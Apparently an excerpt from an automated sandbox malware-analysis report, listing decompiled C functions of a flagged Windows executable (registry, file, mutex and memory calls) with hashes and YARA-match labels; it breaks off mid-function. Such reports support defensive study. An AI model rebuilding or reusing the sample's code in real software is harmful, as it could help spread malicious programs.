                                                            • ExtractIconA.SHELL32(00400000,00000000,00000000), ref: 00406CC7
                                                              • Part of subcall function 00406520: GetIconInfo.USER32(?), ref: 00406540
                                                              • Part of subcall function 00406520: GetObjectA.GDI32(?,00000018,?), ref: 00406551
                                                              • Part of subcall function 00406520: DeleteObject.GDI32(?), ref: 00406566
                                                              • Part of subcall function 00406520: DeleteObject.GDI32(?), ref: 00406574
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Object$DeleteIcon$CursorDestroyExtractInfo
                                                            • String ID:
                                                            • API String ID: 2619871307-0
                                                            • Opcode ID: 12884ea93cf9522b21f7407772e5477059801f61b384028fea43c793ebaab2fd
                                                            • Instruction ID: 3dd68c7f1dd4f5608f9b9662a0ba171f3b5b53225b24c93893625578eb0e5390
                                                            • Opcode Fuzzy Hash: 12884ea93cf9522b21f7407772e5477059801f61b384028fea43c793ebaab2fd
                                                            • Instruction Fuzzy Hash: 32D05E767002202BC321B6BF2CC181B8ADDCACA269316453FB109F7293C97DCC12126D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040575C, Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E0040575C(void* __eax, void* __ecx, void* __edx) {
				long _t4;
				void* _t7;
				void** _t12;

				_t7 = __eax;
				_t4 = RegOpenKeyExA(_t7, E0040340C(__edx), 0, 0x2001f, _t12); // executed
				if(_t4 != 0) {
					 *_t12 = 0;
				}
				return  *_t12;
			}






                                                            0x00405761
                                                            0x00405774
                                                            0x0040577b
                                                            0x0040577f
                                                            0x0040577f
                                                            0x00405788

                                                            APIs
                                                            • RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,0002001F,?,?,?,?,00407A60,00000000,00407AC4,?,?,00000000,00000000,00000000), ref: 00405774
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Open
                                                            • String ID:
                                                            • API String ID: 71445658-0
                                                            • Opcode ID: 069e22fb027c4afddc5b5976f6d816458c7a75ea1a42f49c021bc25e4846d371
                                                            • Instruction ID: 3a3203429d587fd7172cf24d4e67cc15a32e0ac6e1cd073cd859d0159acdf75a
                                                            • Opcode Fuzzy Hash: 069e22fb027c4afddc5b5976f6d816458c7a75ea1a42f49c021bc25e4846d371
                                                            • Instruction Fuzzy Hash: 7AD05EA13046107EE210B62A5C81FBB6ACCCB487A6F00053AF948E6283D225CD0052A5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00404F34, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00404F34(void* __eax, void* __edx) {
				char _v268;
				long _t6;
				void* _t13;
				void* _t14;

				_t13 = __edx;
				_t6 = GetShortPathNameA(E0040340C(__eax),  &_v268, 0x104); // executed
				return E00403184(_t13, _t6, _t14);
			}







                                                            0x00404f3c
                                                            0x00404f52
                                                            0x00404f6a

                                                            APIs
                                                            • GetShortPathNameA.KERNEL32(00000000,?,00000104), ref: 00404F52
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: NamePathShort
                                                            • String ID:
                                                            • API String ID: 1295925010-0
                                                            • Opcode ID: abb4d550bda5475c99f0f2794432747b4105fc54e92a365e7278d0c8b630ade4
                                                            • Instruction ID: 14e814bc68ad69d6c3dbd45ca29a6777f0e45ac5a2bbd03733d3eefc14da3dab
                                                            • Opcode Fuzzy Hash: abb4d550bda5475c99f0f2794432747b4105fc54e92a365e7278d0c8b630ade4
                                                            • Instruction Fuzzy Hash: C9D05EE1B0021027D200B66D1CC2A9BA6CC4B88729F14413A7758EB2D2E9798E1402D9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00404B68, Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 66%
                                                            			E00404B68(CHAR* __eax, unsigned int __edx) {
				CHAR* _t1;
				void* _t2;
				long _t6;
				long _t9;

				_t9 = __edx;
				_t1 = __eax;
				_push(0);
				_t6 = __edx >> 0x00000010 & 0x00001fff;
				if(_t6 == 0) {
					_t6 = 0x80;
				}
				_t2 = CreateFileA(_t1, 0, _t9, 0, _t9, _t6, ??); // executed
				return _t2;
			}







                                                            0x00404b68
                                                            0x00404b68
                                                            0x00404b6a
                                                            0x00404b70
                                                            0x00404b75
                                                            0x00404b77
                                                            0x00404b77
                                                            0x00404b88
                                                            0x00404b8d

                                                            APIs
                                                            • CreateFileA.KERNEL32(00408220,80000301,80000301,00000000,80000301,80000301,00000000,00404CB4,00000000,00404CE6), ref: 00404B88
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: eea2c6d1fddd31fd331317c09d3e296815bd40418f117fca415fb9ec57fe0382
                                                            • Instruction ID: ecc9e2cd6cddaadd7fb33e9927afed1fcbe410aa9616ae81c498ff4a473f225f
                                                            • Opcode Fuzzy Hash: eea2c6d1fddd31fd331317c09d3e296815bd40418f117fca415fb9ec57fe0382
                                                            • Instruction Fuzzy Hash: F9C012E15641113EFA0C22587C37FBB128D83D4714C90962EB206A77D1C458280041AC
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00404018, Relevance: 1.5, APIs: 1, Instructions: 14synchronizationCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 68%
                                                            			E00404018(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
				void* _t8;

				_t4 = _a12;
				asm("sbb eax, eax");
				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
				return _t8;
			}




                                                            0x0040401b
                                                            0x00404023
                                                            0x0040402e
                                                            0x00404034

                                                            APIs
                                                            • CreateMutexA.KERNEL32(00408220,00408206,00408205,?,004075E3,00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000), ref: 0040402E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateMutex
                                                            • String ID:
                                                            • API String ID: 1964310414-0
                                                            • Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                            • Instruction ID: 31d529539147b31f913da60fb79b32c9d72b995d2910e43382fd7a33128a04fb
                                                            • Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                            • Instruction Fuzzy Hash: 8AC01273150248ABC700EEA9DC05D9B33DC5758609B008825B618D7100C139E5909B64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00404EB0, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 58%
                                                            			E00404EB0(void* __eax) {
				int _t4;

				_t4 = CreateDirectoryA(E0040340C(__eax), 0); // executed
				asm("sbb eax, eax");
				return _t4 + 1;
			}




                                                            0x00404ebd
                                                            0x00404ec5
                                                            0x00404ec9

                                                            APIs
                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00404E7A,00000000,00404E9F,?,?,00000000,00000000,00000000,00000000,?,004076D4,00000000,0040798C), ref: 00404EBD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateDirectory
                                                            • String ID:
                                                            • API String ID: 4241100979-0
                                                            • Opcode ID: 386e56552f8266bde2ccc84166bcc5ed92a1d83404cd9177086d901dfc68956f
                                                            • Instruction ID: 54881843ca4f04485c80971131db710ee83c2c1d717b1f588eca7c15a420d4f4
                                                            • Opcode Fuzzy Hash: 386e56552f8266bde2ccc84166bcc5ed92a1d83404cd9177086d901dfc68956f
                                                            • Instruction Fuzzy Hash: 71B092927542401AEA003ABA2CC2B2A098C974460EF10093AF206EA283D47AC9050014
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00404B9C, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00404B9C() {
				void* _t3;
				long _t5;
				void* _t6;
				void* _t10;

				_t5 = GetFileAttributesA(E00404490(_t3)); // executed
				_t6 = _t5 + 1;
				_t10 = _t6;
				if(_t10 != 0) {
					return _t6 - 0x00000001 & 0 | _t10 == 0x00000000;
				}
				return _t6;
			}







                                                            0x00404ba2
                                                            0x00404ba7
                                                            0x00404ba7
                                                            0x00404ba8
                                                            0x00000000
                                                            0x00404bad
                                                            0x00404bb0

                                                            APIs
                                                            • GetFileAttributesA.KERNEL32(00000000,00407EDD,00000000,00408020,?,?,00000000,00000000,?,0040819C,00000000,00408220), ref: 00404BA2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 8025a4ee7f9a6a5e32ffee1429e28f2d9b7c921bde027667d06e53d93cfb3014
                                                            • Instruction ID: b116303671e024f583cda4c1147e2dbfbac77b887c659148fe5224e5fd1b100a
                                                            • Opcode Fuzzy Hash: 8025a4ee7f9a6a5e32ffee1429e28f2d9b7c921bde027667d06e53d93cfb3014
                                                            • Instruction Fuzzy Hash: 65A012C682120114CC1071F1220375A0144E4C02CC38448A62350B00C2C83CE501001D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00404CF8, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00404CF8(CHAR* __eax) {
				long _t4;
				void* _t5;
				void* _t9;

				_t4 = GetFileAttributesA(__eax); // executed
				_t5 = _t4 + 1;
				_t9 = _t5;
				if(_t9 != 0) {
					return _t5 - 0x00000001 & 0 | _t9 != 0x00000000;
				}
				return _t5;
			}






                                                            0x00404cf9
                                                            0x00404cfe
                                                            0x00404cfe
                                                            0x00404cff
                                                            0x00000000
                                                            0x00404d04
                                                            0x00404d07

                                                            APIs
                                                            • GetFileAttributesA.KERNEL32(?,00404E3F,00000000,00404E9F,?,?,00000000,00000000,00000000,00000000,?,004076D4,00000000,0040798C,?,0000144A), ref: 00404CF9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 1dfe280059354c2d3b00f373a1eb4cf2bc4e4ec1fc5d2a6436fb04a1a0edb6b0
                                                            • Instruction ID: 74a4a45bf51c4893599122cbb6035ce0c32fa2704c567f2e8b32d3ffb48088ed
                                                            • Opcode Fuzzy Hash: 1dfe280059354c2d3b00f373a1eb4cf2bc4e4ec1fc5d2a6436fb04a1a0edb6b0
                                                            • Instruction Fuzzy Hash: 66A002C686650749DD1022E56607AAE0249FCD12D8B9D5D665391FA1C2C93CA992902E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00404BB4, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00404BB4(void* __eax, signed int __ecx, long __edx) {
				long _t2;

				_t2 = SetFilePointer(__eax, __edx, 0, __ecx & 0x000000ff); // executed
				return _t2;
			}




                                                            0x00404bbc
                                                            0x00404bc1

                                                            APIs
                                                            • SetFilePointer.KERNEL32(00000000,000003E8,00000000,?,00407179,00000000,004071BF,?,00000000), ref: 00404BBC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            • Opcode ID: 7cf7d094e1152e8ce2a36ef2ea1d814d027d71488bb8302382125c90c8a75838
                                                            • Instruction ID: 68b303876a78b47fa373b2f01407b4ce5b79aa50a67d4c8f5d0a49418ed6adba
                                                            • Opcode Fuzzy Hash: 7cf7d094e1152e8ce2a36ef2ea1d814d027d71488bb8302382125c90c8a75838
                                                            • Instruction Fuzzy Hash: 69A002D85902203AF8182363AC5FF37105C97C0B55FD0855E7351754C164EC6A241039
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040137C, Relevance: 1.3, APIs: 1, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E0040137C(void* __eax, intOrPtr* __ecx, intOrPtr __edx) {
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v28;
				intOrPtr* _v32;
				intOrPtr* _t24;
				intOrPtr _t27;
				intOrPtr _t31;
				int _t32;
				intOrPtr* _t35;
				intOrPtr* _t42;
				void* _t43;
				void* _t44;
				intOrPtr* _t45;

				_t45 =  &_v20;
				_v32 = __ecx;
				 *_t45 = __edx;
				_v28 = 0xffffffff;
				_v24 = 0;
				_t44 = __eax;
				_v20 =  *_t45 + __eax;
				_t35 =  *0x40a5d4; // 0x47f4cc
				while(_t35 != 0x40a5d4) {
					_t42 =  *_t35;
					_t43 =  *(_t35 + 8);
					if(_t44 <= _t43 && _t43 +  *((intOrPtr*)(_t35 + 0xc)) <= _v20) {
						if(_t43 < _v28) {
							_v28 = _t43;
						}
						_t31 = _t43 +  *((intOrPtr*)(_t35 + 0xc));
						if(_t31 > _v24) {
							_v24 = _t31;
						}
						_t32 = VirtualFree(_t43, 0, 0x8000); // executed
						if(_t32 == 0) {
							 *0x40a5b0 = 1;
						}
						E00401184(_t35);
					}
					_t35 = _t42;
				}
				_t24 = _v32;
				 *_t24 = 0;
				if(_v24 != 0) {
					 *_v32 = _v28;
					_t27 = _v24 - _v28;
					 *((intOrPtr*)(_v32 + 4)) = _t27;
					return _t27;
				}
				return _t24;
			}
















                                                            0x00401380
                                                            0x00401383
                                                            0x00401387
                                                            0x0040138a
                                                            0x00401394
                                                            0x00401398
                                                            0x0040139f
                                                            0x004013a3
                                                            0x004013fc
                                                            0x004013ab
                                                            0x004013ad
                                                            0x004013b2
                                                            0x004013c3
                                                            0x004013c5
                                                            0x004013c5
                                                            0x004013cb
                                                            0x004013d2
                                                            0x004013d4
                                                            0x004013d4
                                                            0x004013e0
                                                            0x004013e7
                                                            0x004013e9
                                                            0x004013e9
                                                            0x004013f5
                                                            0x004013f5
                                                            0x004013fa
                                                            0x004013fa
                                                            0x00401404
                                                            0x0040140a
                                                            0x00401411
                                                            0x0040141b
                                                            0x00401421
                                                            0x00401429
                                                            0x00000000
                                                            0x00401429
                                                            0x00401433

                                                            APIs
                                                            • VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 004013E0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeVirtual
                                                            • String ID:
                                                            • API String ID: 1263568516-0
                                                            • Opcode ID: fa7a78eec5dd89a8b83c49400664c27073319ee3a8c610895c3709d3653ec505
                                                            • Instruction ID: f327295f0dbb7d02968337953404c96d08b75f0734ec548ae522820371e35f3d
                                                            • Opcode Fuzzy Hash: fa7a78eec5dd89a8b83c49400664c27073319ee3a8c610895c3709d3653ec505
                                                            • Instruction Fuzzy Hash: CB21E570608741AFD710DF19C880A5FBBE0EB85720F14C96AE8989B7A5D378E841DB5A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401434, Relevance: 1.3, APIs: 1, Instructions: 54memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00401434(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x40a5d4; // 0x47f4cc
				while(_t29 != 0x40a5d4) {
					_t17 =  *(_t29 + 8);
					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}












                                                            0x0040143b
                                                            0x0040143f
                                                            0x00401446
                                                            0x0040145b
                                                            0x00401463
                                                            0x00401469
                                                            0x0040146f
                                                            0x00401472
                                                            0x004014b6
                                                            0x0040147a
                                                            0x00401480
                                                            0x00401484
                                                            0x00401486
                                                            0x00401486
                                                            0x0040148c
                                                            0x0040148e
                                                            0x0040148e
                                                            0x00401494
                                                            0x004014a1
                                                            0x004014a8
                                                            0x004014aa
                                                            0x004014b0
                                                            0x00000000
                                                            0x004014b0
                                                            0x004014a8
                                                            0x004014b4
                                                            0x004014b4
                                                            0x004014c5

                                                            APIs
                                                            • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 004014A1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 6562d44be094aac9c3416d4300413632571bdfff9e6fcfdcc884fc208ae27054
                                                            • Instruction ID: 651c7d6b6741c998796b49b102b161bb2341ec2eea25b0c045f05b7ed0c0d4f4
                                                            • Opcode Fuzzy Hash: 6562d44be094aac9c3416d4300413632571bdfff9e6fcfdcc884fc208ae27054
                                                            • Instruction Fuzzy Hash: E7117072A04701AFC310DF29CD80A2BB7E1EBC4750F15C63DE598673B5D638AC408795
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004014C8, Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 93%
                                                            			E004014C8(void* __eax, void** __ecx, void* __edx) {
				int _t7;
				void* _t9;
				signed int _t14;
				intOrPtr* _t19;
				signed int _t22;
				void** _t23;

				_push(__ecx);
				 *_t23 = __eax + 0x00000fff & 0xfffff000;
				_t22 = __eax + __edx & 0xfffff000;
				 *__ecx =  *_t23;
				_t7 = _t22 -  *_t23;
				__ecx[1] = _t7;
				_t19 =  *0x40a5d4; // 0x47f4cc
				while(_t19 != 0x40a5d4) {
					_t9 =  *(_t19 + 8);
					_t14 =  *((intOrPtr*)(_t19 + 0xc)) + _t9;
					if(_t9 <  *_t23) {
						_t9 =  *_t23;
					}
					if(_t22 < _t14) {
						_t14 = _t22;
					}
					if(_t14 > _t9) {
						_t7 = VirtualFree(_t9, _t14 - _t9, 0x4000); // executed
						if(_t7 == 0) {
							 *0x40a5b0 = 2;
						}
					}
					_t19 =  *_t19;
				}
				return _t7;
			}









                                                            0x004014cc
                                                            0x004014dd
                                                            0x004014e4
                                                            0x004014ed
                                                            0x004014f1
                                                            0x004014f4
                                                            0x004014f7
                                                            0x00401537
                                                            0x004014ff
                                                            0x00401505
                                                            0x0040150a
                                                            0x0040150c
                                                            0x0040150c
                                                            0x00401511
                                                            0x00401513
                                                            0x00401513
                                                            0x00401517
                                                            0x00401522
                                                            0x00401529
                                                            0x0040152b
                                                            0x0040152b
                                                            0x00401529
                                                            0x00401535
                                                            0x00401535
                                                            0x00401544

                                                            APIs
                                                            • VirtualFree.KERNEL32(?,?,00004000,?,?,?,00000000,00004003,0040172F), ref: 00401522
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeVirtual
                                                            • String ID:
                                                            • API String ID: 1263568516-0
                                                            • Opcode ID: 366ed2c7ca182d6b4595971b05bf8940527af6e3e06c25c2a4c3263d2ce5472b
                                                            • Instruction ID: c2f9954cc8299db513f2c37eb2bc070e0fd4fafed15322d1c8bcd52f3136bf23
                                                            • Opcode Fuzzy Hash: 366ed2c7ca182d6b4595971b05bf8940527af6e3e06c25c2a4c3263d2ce5472b
                                                            • Instruction Fuzzy Hash: E501F7736043006FC3109E28DDC092A77A4EBC5324F15053EDA85AB3A1D73AAC0587A8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004070DC, Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 31%
                                                            			E004070DC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				intOrPtr _t19;
				intOrPtr _t24;

				_push(0);
				_push(_t24);
				_push(0x407126);
				_push( *[fs:eax]);
				 *[fs:eax] = _t24;
				E004049D0(0, __ebx,  &_v8, __edi, __esi); // executed
				E00404C78(E0040340C(_v8), __ebx, 0xa200, 0x40a698, __edi, __esi); // executed
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E0040712D);
				return E00403094( &_v8);
			}






                                                            0x004070df
                                                            0x004070e3
                                                            0x004070e4
                                                            0x004070e9
                                                            0x004070ec
                                                            0x004070f4
                                                            0x0040710b
                                                            0x00407112
                                                            0x00407115
                                                            0x00407118
                                                            0x00407125

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileModuleName
                                                            • String ID: MZP
                                                            • API String ID: 514040917-2889622443
                                                            • Opcode ID: 2f22c95ce754a069faf3e5d71a99af3f29d8e87556c895829c3b73c460f21ff1
                                                            • Instruction ID: dbacf8f9bda0d2f3624fed2e55e69454661720eb62c3ca271fb24a4619442e3b
                                                            • Opcode Fuzzy Hash: 2f22c95ce754a069faf3e5d71a99af3f29d8e87556c895829c3b73c460f21ff1
                                                            • Instruction Fuzzy Hash: 32E09270708304AFE701EB72DC13A19B7ACD78A704FA24877E600AA6D1DA7DAE118519
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00404B90, Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00404B90(void* __eax) {
				signed int _t4;

				_t4 = CloseHandle(__eax); // executed
				return _t4 & 0xffffff00 | _t4 != 0x00000000;
			}




                                                            0x00404b91
                                                            0x00404b9b

                                                            APIs
                                                            • CloseHandle.KERNEL32(00000000,00404CD0,00000000,00404CE6), ref: 00404B91
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID:
                                                            • API String ID: 2962429428-0
                                                            • Opcode ID: ef71f196dd3e8bd5321f6bf3e93503307ae4868d30203b0da39ae7c2a7e1010a
                                                            • Instruction ID: f540dd3953723152695a7cfd94b4b723d26dbf970bde7b3718d3bc06e0259ed2
                                                            • Opcode Fuzzy Hash: ef71f196dd3e8bd5321f6bf3e93503307ae4868d30203b0da39ae7c2a7e1010a
                                                            • Instruction Fuzzy Hash:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00407678, Relevance: .1, Instructions: 123COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 52%
                                                            			E00407678(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v40254;
				char _v41488;
				char _v41492;
				char _v41496;
				intOrPtr _v41500;
				char _v41504;
				char _v41508;
				char _v41512;
				char _v41516;
				intOrPtr _v41520;
				char _v41524;
				char _v41528;
				char _v41532;
				char _v41536;
				void* _t49;
				void* _t101;
				intOrPtr _t133;
				intOrPtr _t137;
				intOrPtr _t138;

				_t100 = __ebx;
				_t137 = _t138;
				_t101 = 0x144b;
				do {
					_push(0);
					_push(0);
					_t101 = _t101 - 1;
					_t139 = _t101;
				} while (_t101 != 0);
				_push(_t101);
				_push(_t137);
				_push(0x40798c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t138;
				E00405008( &_v41492, __ebx, _t101);
				_push( &_v41492);
				E004031F4( &_v41496, 9, 0x4091b4);
				_pop(_t49);
				E00403214(_t49, _v41496);
				E00404DE0(_v41492, __ebx); // executed
				E00405008( &_v41504, __ebx, 9);
				_push(_v41504);
				E004031F4( &_v41508, 9, 0x4091b4);
				_push(_v41508);
				E004031F4( &_v41512, 3, 0x4091dc);
				_push(_v41512);
				E004032CC();
				E00405200(_v41500, __ebx, __esi, _t139); // executed
				E004049D0(0, _t100,  &_v41516, __edi, __esi);
				_v8 = E00405B60(_v41516,  &_v41516);
				_push(_t137);
